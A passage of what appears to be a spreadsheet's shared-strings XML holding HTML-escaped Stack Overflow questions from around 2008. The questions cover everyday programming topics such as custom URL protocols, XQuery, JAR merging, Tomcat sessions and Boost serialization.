  completedSynchronously)&lt;/p&gt;
  &lt;p&gt;at ApplicationStepManager.ResumeSteps(Exception error)&lt;/p&gt;
  &lt;p&gt;at
  HttpApplication.System.Web.IHttpAsyncHandler.BeginProcessRequest(HttpContext
  context, AsyncCallback cb, Object extraData)&lt;/p&gt;
  &lt;p&gt;at HttpRuntime.ProcessRequestInternal(HttpWorkerRequest wr)&lt;/p&gt;
  &lt;p&gt;at HttpRuntime.ProcessRequestNoDemand(HttpWorkerRequest wr)&lt;/p&gt;
  &lt;p&gt;at ISAPIRuntime.ProcessRequest(IntPtr ecb, Int32 iWRType)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Any idea on this.?&lt;/p&gt;
&lt;p&gt;Have anyone of you come across such an issue. I've been trying to resolve this issue but hard luck.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I register a custom URL protocol in Windows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I register a custom protocol with Windows so that when clicking a link in an email or on a web page my application is opened and the parameters from the URL are passed to it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Phantom Referenced Objects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Phantom References serve for post-mortem operations.
The Java specification states that a &lt;strong&gt;phantom referenced object&lt;/strong&gt; will not be deallocated until the phantom-reference itself is cleaned.&lt;/p&gt;
&lt;p&gt;My question is: What purpose does this feature (object not deallocated) serve?&lt;/p&gt;
&lt;p&gt;(The only idea i came up with, is to allow native code to do post-mortem cleanup on the object, but it isn't much convincing).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how XQUERY is actually used?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been reading lot of XQUERY tutorial on the web site. Almost all of them are teaching me the XQUERY syntax. Let's say i have understood the XQUERY syntax, how am i going to actually implement XQUERY on my web site?&lt;/p&gt;
&lt;p&gt;For example, i have book.xml:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="iso-8859-1" ?&amp;gt;
&amp;lt;books&amp;gt;
&amp;lt;book&amp;gt;
   &amp;lt;title&amp;gt;Doraemon&amp;lt;/title&amp;gt;
   &amp;lt;authorid&amp;gt;1&amp;lt;/authorid&amp;gt;
&amp;lt;/book&amp;gt;
&amp;lt;book&amp;gt;
   &amp;lt;title&amp;gt;Ultraman&amp;lt;/title&amp;gt;
   &amp;lt;authorid&amp;gt;2&amp;lt;/authorid&amp;gt;
&amp;lt;/book&amp;gt;
&amp;lt;/books&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then, i have author.xml&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="iso-8859-1" ?&amp;gt;
&amp;lt;authors&amp;gt;
&amp;lt;author id="1"&amp;gt;Mr A&amp;lt;/author&amp;gt;
&amp;lt;author id="2"&amp;gt;Mr B&amp;lt;/author&amp;gt;
&amp;lt;/authors&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to generate HTML which looks like following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;table&amp;gt;
&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Title&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;Author&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Doraemon&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;Mr A&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Ultraman&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;Mr B&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
&amp;lt;/table&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Please show me some example. Or any web site that i can do reference. Thanks very much.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>OpenFileDialog. How about "Specify Directory Dialog"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On a file path field, I want to capture the directory path like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;textbox1.Text = directory path
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Anyone?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is anyone using XForms in their web applications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A few years ago we started playing around with &lt;a href="http://www.w3.org/MarkUp/Forms/"&gt;XForms&lt;/a&gt; from the W3C for a web app which required hundreds of custom forms.&lt;/p&gt;
&lt;p&gt;As they aren't currently supported natively by the major browsers, what parsers/tools are you using on your projects today?&lt;/p&gt;
&lt;p&gt;I'm not really interested in plugins - this needs to be something server side that emulates XForms.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating/modifying images in JavaScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to &lt;strong&gt;dynamically create and modify images&lt;/strong&gt; on a &lt;strong&gt;per pixel level&lt;/strong&gt; in JavaScript (on client side)? Or has this to be done with server based languaged, such as PHP? &lt;/p&gt;
&lt;p&gt;My use case is as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The user opens webpage and loads locally stored image&lt;/li&gt;
&lt;li&gt;A preview of the image is displayed&lt;/li&gt;
&lt;li&gt;The user can modify the image with a set of sliders (pixel level operations)&lt;/li&gt;
&lt;li&gt;In the end he can download the image to his local HDD&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;When searching in the web I just found posts about using IE's filtering method, but didn't find anything about image editing functions in JavaScript.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to tackle global hotkey processing in c#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/48935/how-can-i-register-a-global-hot-key-to-say-ctrlshiftletter-using-wpf-and-ne"&gt;How can I register a global hot key to say CTRL+SHIFT+(LETTER) using WPF and .NET 3.5?&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I'd like to have multiple global hotkeys in my new app (to control the app from anywhere in windows), and all of the given sources/solutions I found on the web seem to provide with a sort of a limping solution (either solutions only for one g.hotkey, or solutions that while running create annoying mouse delays on the screen).&lt;/p&gt;
&lt;p&gt;Does anyone here know of a resource that can help me achive this, that I can learn from?
Anything?&lt;/p&gt;
&lt;p&gt;Thanks !  :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Auto-generating Unit-Tests for legacy Java-code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best, preferably free/open source tool for auto-generating Java unit-tests? I know, the unit-tests cannot really serve the same purpose as normal TDD Unit-Tests which document and drive the design of the system. However auto-generated unit-tests can be useful if you have a huge legacy codebase and want to know whether the changes you are required to make will have unwanted, obscure side-effects.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get the file path from HTML input form in Firefox 3</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have simple HTML form with &lt;code&gt;&amp;lt;input type="file"&amp;gt;&lt;/code&gt;, like shown below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;form&amp;gt;
  &amp;lt;label for="attachment"&amp;gt;Attachment:&amp;lt;/label&amp;gt;
  &amp;lt;input type="file" name="attachment" id="attachment"&amp;gt;
  &amp;lt;input type="submit"&amp;gt;
&amp;lt;/form&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In IE7 (and probably all famous browsers, including old Firefox 2), if we submit a file like '//server1/path/to/file/filename' it works properly and gives the full path to the
file and the filename.&lt;/p&gt;
&lt;p&gt;In Firefox 3, it returns only 'filename', because of their new 'security feature' to truncate the path, as explained in Firefox bug tracking system (&lt;a href="https://bugzilla.mozilla.org/show_bug.cgi?id=143220"&gt;https://bugzilla.mozilla.org/show_bug.cgi?id=143220&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;I have no clue how to overcome this 'new feature' because it causes all upload forms in my webapp to stop working on Firefox 3.&lt;/p&gt;
&lt;p&gt;Can anyone help to find a single solution to get the file path both on Firefox 3 and IE7?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Easiest way to merge a release into one JAR file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a tool or script which easily merges a bunch of &lt;a href="http://en.wikipedia.org/wiki/JAR_%28file_format%29"&gt;JAR&lt;/a&gt; files into one JAR file? A bonus would be to easily set the main-file manifest and make it executable.&lt;/p&gt;
&lt;p&gt;The concrete case is a &lt;a href="http://jrst.labs.libre-entreprise.org/en/user/functionality.html"&gt;Java restructured text tool&lt;/a&gt;. I would like to run it with something like:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;java -jar rst.jar&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;As far as I can tell, it has no dependencies which indicates that it shouldn't be an easy single-file tool, but the downloaded ZIP file contains a lot of libraries.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;      0  11-30-07 10:01   jrst-0.8.1/
    922  11-30-07 09:53   jrst-0.8.1/jrst.bat
    898  11-30-07 09:53   jrst-0.8.1/jrst.sh
   2675  11-30-07 09:42   jrst-0.8.1/readmeEN.txt
 108821  11-30-07 09:59   jrst-0.8.1/jrst-0.8.1.jar
   2675  11-30-07 09:42   jrst-0.8.1/readme.txt
      0  11-30-07 10:01   jrst-0.8.1/lib/
  81508  11-30-07 09:49   jrst-0.8.1/lib/batik-util-1.6-1.jar
2450757  11-30-07 09:49   jrst-0.8.1/lib/icu4j-2.6.1.jar
 559366  11-30-07 09:49   jrst-0.8.1/lib/commons-collections-3.1.jar
  83613  11-30-07 09:49   jrst-0.8.1/lib/commons-io-1.3.1.jar
 207723  11-30-07 09:49   jrst-0.8.1/lib/commons-lang-2.1.jar
  52915  11-30-07 09:49   jrst-0.8.1/lib/commons-logging-1.1.jar
 260172  11-30-07 09:49   jrst-0.8.1/lib/commons-primitives-1.0.jar
 313898  11-30-07 09:49   jrst-0.8.1/lib/dom4j-1.6.1.jar
1994150  11-30-07 09:49   jrst-0.8.1/lib/fop-0.93-jdk15.jar
  55147  11-30-07 09:49   jrst-0.8.1/lib/activation-1.0.2.jar
 355030  11-30-07 09:49   jrst-0.8.1/lib/mail-1.3.3.jar
  77977  11-30-07 09:49   jrst-0.8.1/lib/servlet-api-2.3.jar
 226915  11-30-07 09:49   jrst-0.8.1/lib/jaxen-1.1.1.jar
 153253  11-30-07 09:49   jrst-0.8.1/lib/jdom-1.0.jar
  50789  11-30-07 09:49   jrst-0.8.1/lib/jewelcli-0.41.jar
 324952  11-30-07 09:49   jrst-0.8.1/lib/looks-1.2.2.jar
 121070  11-30-07 09:49   jrst-0.8.1/lib/junit-3.8.1.jar
 358085  11-30-07 09:49   jrst-0.8.1/lib/log4j-1.2.12.jar
  72150  11-30-07 09:49   jrst-0.8.1/lib/logkit-1.0.1.jar
 342897  11-30-07 09:49   jrst-0.8.1/lib/lutinwidget-0.9.jar
2160934  11-30-07 09:49   jrst-0.8.1/lib/docbook-xsl-nwalsh-1.71.1.jar
 301249  11-30-07 09:49   jrst-0.8.1/lib/xmlgraphics-commons-1.1.jar
  68610  11-30-07 09:49   jrst-0.8.1/lib/sdoc-0.5.0-beta.jar
3149655  11-30-07 09:49   jrst-0.8.1/lib/xalan-2.6.0.jar
1010675  11-30-07 09:49   jrst-0.8.1/lib/xercesImpl-2.6.2.jar
 194205  11-30-07 09:49   jrst-0.8.1/lib/xml-apis-1.3.02.jar
  78440  11-30-07 09:49   jrst-0.8.1/lib/xmlParserAPIs-2.0.2.jar
  86249  11-30-07 09:49   jrst-0.8.1/lib/xmlunit-1.1.jar
 108874  11-30-07 09:49   jrst-0.8.1/lib/xom-1.0.jar
  63966  11-30-07 09:49   jrst-0.8.1/lib/avalon-framework-4.1.3.jar
 138228  11-30-07 09:49   jrst-0.8.1/lib/batik-gui-util-1.6-1.jar
 216394  11-30-07 09:49   jrst-0.8.1/lib/l2fprod-common-0.1.jar
 121689  11-30-07 09:49   jrst-0.8.1/lib/lutinutil-0.26.jar
  76687  11-30-07 09:49   jrst-0.8.1/lib/batik-ext-1.6-1.jar
 124724  11-30-07 09:49   jrst-0.8.1/lib/xmlParserAPIs-2.6.2.jar
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see, it is somewhat desirable to not need to do this manually.&lt;/p&gt;
&lt;p&gt;So far I've only tried AutoJar and ProGuard, both of which were fairly easy to get running. It appears that there's some issue with the constant pool in the JAR files.&lt;/p&gt;
&lt;p&gt;Apparently jrst is slightly broken, so I'll make a go of fixing it. The &lt;a href="http://en.wikipedia.org/wiki/Apache_Maven"&gt;Maven&lt;/a&gt; &lt;code&gt;pom.xml&lt;/code&gt; file was apparently broken too, so I'll have to fix that before fixing jrst ... I feel like a bug-magnet :-)&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Update: I never got around to fixing this application, but I checked out &lt;a href="http://en.wikipedia.org/wiki/Eclipse_%28software%29"&gt;Eclipse&lt;/a&gt;'s "Runnable JAR export wizard" which is based on a fat JAR. I found this very easy to use for deploying my own code.&lt;/p&gt;
&lt;p&gt;Some of the other excellent suggestions might be better for builds in a non-Eclipse environment, oss probably should make a nice build using &lt;a href="http://en.wikipedia.org/wiki/Apache_Ant"&gt;Ant&lt;/a&gt;. (Maven, so far has just given me pain, but others love it.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I listen to a RoutedEvent from a class that doesn't derive from FrameworkElement ? Can it be done?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The question says it all basically. &lt;/p&gt;
&lt;p&gt;I want in a &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class MyClass
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to listen to a routed event. Can it be done ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>private IP address ranges</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the private IP address ranges?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to retrieve stored procedure return values from a TableAdapter</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I cannot find an elegant way to get the return value from a stored procedure when using TableAdapters.&lt;/p&gt;
&lt;p&gt;It appears the TableAdapter does not support SQL stored procedure return values when using a non-scalar stored procedure call. You'd expect the return value from the auto-generated function would be the return value from the stored procedure but it isn't (it is actually the number of rows affected). Although possible to use 'out' parameters and pass a variable as a ref to the auto generated functions it isn't a very clean solution.&lt;/p&gt;
&lt;p&gt;I have seen some ugly hacks on the web to solve this, but no decent solution. Any help would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you add a JavaScript widget to a Wordpress.com hosted blog?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a &lt;a href="http://notebooks.readerville.com/"&gt;site&lt;/a&gt; that provides blog-friendly widgets via JavaScript. These work fine in most circumstances, including self-hosted Wordpress blogs. With blogs hosted at Wordpress.com, however, JavaScript isn't allowed in sidebar text modules. Has anyone seen a workaround for this limitation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to suppress Terminated message after killing in bash?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can you suppress the &lt;code&gt;Terminated&lt;/code&gt; message that comes up after you kill a
process in a bash script?&lt;/p&gt;
&lt;p&gt;I tried &lt;code&gt;set +bm&lt;/code&gt;, but that doesn't work.&lt;/p&gt;
&lt;p&gt;I know another solution involves calling &lt;code&gt;exec 2&amp;gt; /dev/null&lt;/code&gt;, but is that
reliable? How do I reset it back so that I can continue to see stderr?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>override constraint from no action to cascading at runtime</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I feel like I have a verry basic/stupid question, yet I never saw/read/heard anything in this direction.&lt;/p&gt;
&lt;p&gt;Say I have a table &lt;em&gt;users(userId, name)&lt;/em&gt; and a table &lt;em&gt;preferences(id, userId, language)&lt;/em&gt;. The example is trivial, but could be extended to a situation with multi-level relations and way more tables..
When my UI requests to delete a user I first want to show a warning stating that also its preferences will be deleted. If at some point the database gets extended with more tables and relationships, but the software isn't adapted accordingly (client didn't update) a generic message should be shown.&lt;/p&gt;
&lt;p&gt;How can I implement this? The UI cannot know about the whole data structure and should not be bothered to walk down all the relations to manually delete all the depending records.&lt;br /&gt;
I would think this would be with constraints.
The constraint would be &lt;em&gt;no action&lt;/em&gt; at first so the constraint will throw an error that can be caught by the UI. After the UI receives a confirmation, the constraint should become a &lt;em&gt;cascade&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Somehow I'm feeling like I'm getting this all wrong..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What prevents a Thread in C# from being Collected?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In .NET, after this code, what mechanism stops the &lt;code&gt;Thread&lt;/code&gt; object from being garbage collected?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;new Thread(Foo).Start();
GC.Collect();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Yes, it's safe to assume &lt;strong&gt;something&lt;/strong&gt; has a reference to the thread, I was just wandering what exactly. For some reason Reflector doesn't show me &lt;code&gt;System.Threading&lt;/code&gt;, so I can't dig it myself (I know MS released the source code for the .NET framework, I just don't have it handy).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is anyone developing facebook apps on Grails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have not seen much support for Grails to develop facebook apps.I was just wondering if people around are developing facebook apps on grails &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rails or Grails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Grails vs Rails. Which has better support? And which one is a better choice to develop medium size apps with? Most importantly which one has more plug-ins?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to print a variable's type in standard C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int a = 12;
cout &amp;lt;&amp;lt; typeof(a) &amp;lt;&amp;lt; endl;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Expected output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>PyQt and PyCairo</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know it's possible to place a PyCairo surface inside a Gtk Drawing Area. But I think Qt is a lot better to work with, so I've been wondering if there's anyway to place a PyCairo surface inside some Qt component?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I use calculated value date in Sharepoint lists field to find a date+30 days?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a list I've built in Sharepoint, where one of the fields is a date that the user enters.
I want to add another field, which is a calculated value field that needs to be the date provided by the user + 30 days.
What formula do I need to pass to the calculated value field to achieve that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to specify a different session store with Tomcat?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Tomcat (version 5 here) stores session information in memory. When clustering this information is periodically broadcast to other servers in the cluster to keep things in sync. You can use a database store to make sessions persistant but this information is only written periodically as well and is only really used for failure-recovery rather than actually replacing the in-memory sessions.&lt;/p&gt;
&lt;p&gt;If you don't want to use sticky sessions (our configuration doesn't allow it unfortunately) this raises the problem of the sessions getting out of sync.&lt;/p&gt;
&lt;p&gt;In other languages, web frameworks tend to allow you to use a database as the primary session store. Whilst this introduces a potential scaling issue it does make session management very straightforward. I'm wondering if there's a way to get tomcat to use a database for sessions in this way (technically this would also remove the need for any clustering configuration in the tomcat server.xml).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Way to Alt-Tab through all applications in Virtual and Host PC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using VirtualPc 2007 more and more, the one annoyance is "Alt-Tab".&lt;/p&gt;
&lt;p&gt;What I want is to be able to use alt-tab to iterate through all of the applications in the host pc and virtual(s) as if they were one long list. Is there a setting or program to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to handle URLs in a multilingual site in ASP.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to do a multilingual website, with urls like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;www.domain.com/en/home.aspx for english
www.domain.com/es/home.aspx for spanish
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the past, I would set up two virtual directories in IIS, and then detect the URL in global.aspx and change the language according to the URL&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Sub Application_BeginRequest(ByVal sender As Object, ByVal e As EventArgs)
    Dim lang As String
    If HttpContext.Current.Request.Path.Contains("/en/") Then
        lang = "en"
    Else
        lang = "es"
    End If
    Thread.CurrentThread.CurrentUICulture = CultureInfo.GetCultureInfo(lang)
    Thread.CurrentThread.CurrentCulture = CultureInfo.CreateSpecificCulture(lang)
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The solution is more like a hack.  I'm thinking about using Routing for a new website.  &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Do you know a better or more elegant way to do it?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;edit: The question is about the URL handling, not about resources, etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>svn over HTTP proxy</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm on laptop (Ubuntu) with a network that use HTTP proxy (only http connections allowed).&lt;br&gt;
When I use svn up for url like 'http://.....' everything is cool (google chrome repository works perfect), but right now I need to svn up from server with 'svn://....' and I see connection refused.&lt;br&gt;
I've set proxy configuration in /etc/subversion/servers but it doesn't help.&lt;br&gt;
Anyone have opinion/solution?&lt;br&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Boost serialization: specifying a template class version</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a template class that I serialize (call it C), for which I want to specify a version for boost serialization. As BOOST_CLASS_VERSION does not work for template classes. I tried this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;namespace boost {
namespace serialization {
    template&amp;lt; typename T, typename U &amp;gt;
    struct version&amp;lt; C&amp;lt;T,U&amp;gt; &amp;gt;
    {
        typedef mpl::int_&amp;lt;1&amp;gt; type;
        typedef mpl::integral_c_tag tag;
        BOOST_STATIC_CONSTANT(unsigned int, value = version::type::value);
    };
}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but it does not compile. Under VC8, a subsequent call to BOOST_CLASS_VERSION gives this error:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;error C2913: explicit specialization; 'boost::serialization::version' is not a specialization of a class template&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;What is the correct way to do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What files are you allowed to modify in SharePoint 2007?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What files can we modify so that our solution is still supported by Microsoft?&lt;/p&gt;
&lt;p&gt;Is it allowed to customize error pages? 
Can we modify the web.config files to use custom HTTPHandlers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Yahoo! Pipes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Have you used &lt;a href="http://pipes.yahoo.com/pipes/" rel="nofollow"&gt;pipes.yahoo.com&lt;/a&gt; to quickly and easily do... anything? I've recently created a quick &lt;a href="http://pipes.yahoo.com/kooshmoose/stackoverflow_merge" rel="nofollow"&gt;mashup of StackOverflow tags&lt;/a&gt; (&lt;a href="http://pipes.yahoo.com/pipes/pipe.run?_id=NIlbqD_E3RGfAAUWpgt1Yg&amp;amp;_render=rss" rel="nofollow"&gt;via rss&lt;/a&gt;) so that I can browse through new questions in fields I like to follow.&lt;/p&gt;
&lt;p&gt;This has been around for some time, but I've just recently revisited it and I'm completely impressed with it's ease of use. It's almost to the point where I could set up a pipe and then give a client privileges to go in and edit feed sources... and I didn't have to write more than a few lines of code.&lt;/p&gt;
&lt;p&gt;So, what other practical uses can you think of for pipes?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Connecting to Oracle using PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a PHP Developer, but I am confused on how to connect to a remote Oracle database instance from PHP. I simply need to query a read only database and get some data. Do I need to have the Oracle Instant Client or the extension is enough? Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Trip time calculation in relational databases?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I had this question in mind and since I just discovered this site I decided to post it here.&lt;/p&gt;
&lt;p&gt;Let's say I have a table with a timestamp and a state for a given "object" (generic meaning, not OOP object); is there an optimal way to calculate the time between a state and the next occurrence of another (or same) state (what I call a "trip") with a single SQL statement (inner SELECTs and UNIONs aren't counted)?&lt;/p&gt;
&lt;p&gt;Ex: For the following, the trip time between Initial and Done would be 6 days, but between Initial and Review it would be 2 days.  &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;2008-08-01 13:30:00 - Initial&lt;br /&gt;
  2008-08-02 13:30:00 - Work&lt;br /&gt;
  2008-08-03 13:30:00 - Review&lt;br /&gt;
  2008-08-04 13:30:00 - Work&lt;br /&gt;
  2008-08-05 13:30:00 - Review&lt;br /&gt;
  2008-08-06 13:30:00 - Accepted&lt;br /&gt;
  2008-08-07 13:30:00 - Done&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;No need to be generic, just say what &lt;a href="http://stackoverflow.com/questions/980813/what-is-sgbd"&gt;SGBD&lt;/a&gt; your solution is specific to if not generic.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ORA-00161: transaction branch length 103 is illegal (maximum allowed 64</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ORA-00161: transaction branch length 103 is illegal (maximum allowed 64â€¦
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm using the DAC from Oracle, any idea if there is a patch for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What alternatives are there to the MATLAB Editor?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Some things that I personally find as shortcomings in the MATLAB Editor:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;virtually no code completion available&lt;/li&gt;
&lt;li&gt;does not run OS native (on MacOS) - but in X-Environment (shortcuts, copy&amp;amp;paste problems, keymappings, non intuitive window-managing)&lt;/li&gt;
&lt;li&gt;virtually no refactoring tools&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Are there alternative editors with these features?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get the unique values of an array in .net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I've got this array:
MyArray(0)="aaa"
MyArray(1)="bbb"
MyArray(2)="aaa"&lt;/p&gt;
&lt;p&gt;Is there a .net function which can give me the unique values? I would like something like this as an output of the function:
OutputArray(0)="aaa"
OutputArray(1)="bbb"&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the difference between TrueType fonts and Type-1 fonts?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the difference between TrueType fonts and Type-1 fonts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I call a SQL Server stored procedure from PowerShell?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a large CSV file and I want to execute a stored procedure for each line.&lt;/p&gt;
&lt;p&gt;What is the best way to execute a stored procedure from PowerShell?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ does begin/end/rbegin/rend execute in constant time for std::set, std::map, etc?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For data types such as std::set and std::map where lookup occurs in logarithmic time, is the implementation required to maintain the begin and end iterators? Does accessing begin and end imply a lookup that could occur in logarithmic time?&lt;/p&gt;
&lt;p&gt;I have always assumed that begin and end always occur in constant time, however I can't find any confirmation of this in Josuttis. Now that I'm working on something where I need to be anal about performance, I want to make sure to cover my bases.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamically add CalendarExtender to Textbox subclass server control?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a server control, which inherits from TextBox, that will automatically have a &lt;a href="http://www.asp.net/AJAX/AjaxControlToolkit/Samples/Calendar/Calendar.aspx" rel="nofollow"&gt;CalendarExtender&lt;/a&gt; attached to it. Is it possible to do this, or does my new control need to inherit from CompositeControl instead? I've tried the former, but I'm not clear during which part of the control lifecycle I should create the new instance of the CalendarExtender, and what controls collection I should add it to. I don't seem to be able to add it to the Page or Form's controls collection, and if I add it to the (TextBox) control's collection, I get none of the pop-up calendar functionality.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a Functional Programming library for .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For example, in Java there is &lt;a href="http://functionaljava.org/"&gt;Functional Java&lt;/a&gt; and &lt;a href="http://www.cs.chalmers.se/~bringert/hoj/"&gt;Higher-Order Java&lt;/a&gt;.  Both essentially give a small API for manipulating higher-order, curried functions, and perhaps a few new data types (tuples, immutable lists).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it the filename or the whole URL used as a key in browser caches?</t>
  </si>
  <si>
